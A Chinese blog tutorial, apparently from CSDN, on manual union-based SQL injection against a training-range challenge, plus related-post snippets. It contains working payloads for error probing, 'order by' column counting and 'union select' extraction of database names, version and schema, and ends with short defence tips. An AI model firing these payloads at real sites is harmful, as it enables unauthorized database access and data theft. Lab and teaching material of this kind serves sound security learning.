sql简单注入-------基本步骤

最新推荐文章于 2024-08-06 02:26:33 发布
最新推荐文章于 2024-08-06 02:26:33 发布
阅读量1.3k 收藏 1
点赞数 4
分类专栏: 网络安全 文章标签: sql注入原理 防止sql注入 ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xiaoduanDDG/article/details/102763651
版权

本题用封神台靶场,第一道拯救女神小芳-猫舍的题作为例子

1.判断与数据库交互的地方是否存在注入点

方法:加入单引号' 使数据库报错,说明存在注入点

2.判断字段数

用order by 或者group by

59.63.200.79:8003/?id=1 order by 1    //如果不报错则至少要有一个字段,进行第二个测试,直到报错为止

59.63.200.79:8003/?id=1 order by  3  //如果3 报错,证明有2个字段

3.查找回显点

59.63.200.79:8003/?id=1 and 1=2 union select 1,2 from admin

//这里的1,2可以换成别的,只要保证有两个字段就可以,

//admin 是数据库的名称,可以用爆字段,爆表的方法查出来,具体自行百度

这时,在页面中就会出现相应的数字,就是我们要找的回显点,比如页面上出现数字2,我们就把2的位置改为我们想要知道的信息

4.找出信息

59.63.200.79:8003/?id=1 and 1=2 union select 1,database() from admin

这时,数据库的名称就会显示在原来显示2的位置上,

同理,database()可以换成version()等

总结:1.以上为简单注入,如果修改url被拦截,需要使用工具,进行cookie注入,方法一样

2.sql注入 分为1.char型2.int型,主要利用单引号的闭合原理,将输入的sql 语句与数据库进行交互,实现增 删 改 查功能

3.防止sql 注入的方法:

数据库参数化,

字符转译:addslashes()

过滤

 

李昭仪668
关注
专栏目录
SQL注入-02-注入步骤
xhxtalent的博客
11-24 1673
SQL注入的攻击步骤: 1、确认注入攻击目标网站 2、目标网站的一般信息的收集、分析与提取 3、网站技术分析:寻找和测试可用注入点,网页输入输出机制分析 4、探子回报:注入SQL确定数据库类型,当前账户权限级别 5、提权分析:根据用户级别确定是否可以与系统层交互提权,是否可以与数据库层交互提权,是否可以获取web后台管理员权限的可能性 6、网站可用SQL注入类型测试,盲注?显注? 7、盲注策略:使用注入分析工具替代人工 ​ 显注策略:第三者上位 攻击的准备–信息收集与分析 1.信念: 没有无用的信息 黑
第四节 基于报错的SQL注入-01
09-15
基于报错的SQL注入 SQL注入是一种常见的Web应用程序漏洞,攻击者可以通过在输入参数中inject恶意SQL代码来获取敏感数据或控制服务器。今天,我们将讨论基于报错的SQL注入,包括其分类、发现和利用方法。 SQL注入...
sql简单注入
weixin_51646864的博客
06-13 691
原理: 当我们在查询一些数据时,输入我们指定的查询内容后,后台会根据用户的输入来执行SQL语句查询,类似于SELECT * FROM xxx表 WHERE id=’’,而用户可以在id字段构造一些危险的查询语句。 简单union注入步骤: 这里以攻防世界的一个题目的模型进行注入。 1、判断注入漏洞: (1)and 1=1 / and 1=2 若回显页面不同则说明是整形注入,否则不是 (2)-1/+1 回显下一个或上一个页面说明是整形注入,否则不是 (3)单引号判断 ‘ 显示数据库错误信息或者页面回显不同,说
简单SQL注入
weixin_46148324的博客
03-01 1713
SQL注入原理 1、定义 定义:SQL注入即是指web应用程序对用户输入数据的合法性没有判断,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。 2、基本方式 sql注入可以绕过后台登录直接进入数据库,从而得到所需要的用户数据等重要数据,可以得到相关服务器密码进入服务器达到入侵的目的。 sql...
SQL注入
最新发布
ran267513的博客
08-06 885
SQL Injection)是一种常见的Web安全漏洞,形成的主要原因是web应用程序在接收相关数据参数时未做好过滤,将其直接带入到数据库中查询,导致攻击者可以拼接执行构造的SQL语句。那什么是SQL了?结构化查询语言(Structured Query Language,缩写:SQL),是一种关系型数据库查询的标准编程语言,用于存取数据以及查询、更新、删除和管理关系型数据库(即SQL是一种数据库查询语言)判断注入点判断字段数判断回显点查询相关内容判断库名判断表名判断列名。
简单SQL注入(小白级)
m0_46625346的博客
05-18 477
简单SQL注入 1.找数据库名 http://IP地址/sqli-labs/Less-1/?id=11111111’ union select 1,group_concat(schema_name),3 from information_schema.schemata %23 //找数据库名 得到wfafaefawcaf 2.找表名 http://IP地址/sqli-labs/Less-1/?id=11111111’ union select 1,group_concat(table_name),3 f
Secure-Systems-of-SQL-Injection-Attack:具有SQL注入漏洞的安全系统
05-01
具有SQL注入漏洞的安全系统 抽象的 Web应用程序带来了新型的计算机安全漏洞,例如SQL注入。 这是一类基于输入验证的漏洞。 SQL注入的典型用法是从数据库泄漏机密信息,绕过身份验证逻辑或向数据库中添加未经授权的...
网络安全-实验六-SQL注入-基本手工注入.docx
11-10
SQL注入是一种常见的网络安全威胁,它利用了不安全的Web应用程序中的设计缺陷,使得攻击者能够通过构造特定的SQL语句来操纵或访问数据库。在实验六中,我们将深入理解并实践这种攻击方式,以提高对网络安全的认识。 ...
09-sql注入-mssql1
08-03
SQL注入是一种常见的安全漏洞,攻击者通过输入恶意SQL语句来获取未授权的数据或执行恶意操作。针对SQL Server,攻击者可能使用的注入技术包括: 1. 判断是否存在注入漏洞。 2. 确定数据库类型。 3. 猜测表名和字段。...
DVWA-------简单SQL注入
热门推荐
weixin_53139899的博客
04-17 1万+
DVWA-----SQL注入 提示:以下是本篇文章正文内容,下面案例可供参考 一、实验目的 (1)理解SQL注入原理; (2)学习手工注入的过程; (3)掌握SQL注入工具的使用; (4)掌握SQL注入的防御技术。 二、实验要求 1、登陆DVWA平台,结合所学SQL注入漏洞的基本知识,爆出MYSQL版本号、安装路径等信息;最终 爆出当前使用的数据库名称、数据表名称、字段名称、以及关键的字段值(比如用户名、密码等)。 2、DVWA安全级别设置为“Low”或者“Medium”,均可。 判断是否存在SQL注入
简单sql注入入门
d2231300271的博客
03-24 422
基本流程是:观察注入点->判断参数类型-->判断列数(group by或order by)-->观察是否存在显示位(就是页面能够显示列数据的位置(实践理解)),语法报错,异常页面显示(根据不同情况选择不同的注入方式)-->根据不同的注入方式依次显示库,列,表。当前99%以上的MySQL版本都是5.0以上,都支information_schema 库(),所以我们会使用该库进行爆数据库-->爆数据表--爆数据列-->爆数据(类似于根据目录查页数然后翻到相对于的位置)字段表示的是数据库中所有的字段信息。
一个简单SQL注入攻击
train的专栏
05-18 4765
在上一篇博客中:http://blog.csdn.net/suwei19870312/article/details/7579667。讲了Client 端代码和Server端代码的交互。 Client端代码通过GET method,向Server端代码user.php传递了一个参数q, 在user.php代码中使用参数q来构建访问数据库的SQL语句: $sql="SELECT *
SQL注入简单入门
A1andNS's Blog
12-15 2345
简单SQL注入过程,和上手实验。简单的讲述SQL注入过程。
实验吧 简单sql注入
windseraph2的博客
05-19 2787
http://ctf5.shiyanbar.com/423/web/  知识点:当过滤空格时,通常用()或/**/代替空格 payload 1'/**/union/**/select/**/flag/**/from/**/flag/**/where/**/'1'='1
所谓最简单SQL注入
扯蛋的青春与蛋痛的生活
01-12 1949
今天没带眼镜,,所以不太想干活 也不知怎的, 对公司另一同事写的业务台模块来了兴趣..帮其"测试一下" 在VC的代码片段是 CString SqlText = "Select User_ID, Login_Name, Login_Pwd, Chinese_Name, Operation from A_Employee Where Login_Name = '" +
记一次简单SQL注入
he320631127的博客
08-06 575
参考:http://103.238.227.13:10083/ bugku 可以看到编码是gb2312 测试注入点 id=1和id=1‘ 都没错 应该是宽字节注入,在试试 id=%df’ 报错 接着来 输入字段id=%df’ union select 1,2 %23 查看数据库的名 查看要找的key表里面的string ...
完成一次简单SQL 注入
wujiandao的专栏
09-03 493
先来看几起 SQL 注入的安全事件: Joomla 对象注入漏洞 事件概述:2015年10月29日国外知名CMS(内容管理系统)Joomla,爆出存在SQL注入漏洞,该漏洞影响了 1.5 到 3.4.5 的所有版本,漏洞利用无须登录,直接在前台即可执行任意PHP代码。这个漏洞在libraries/joomla/sesion/sesion...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值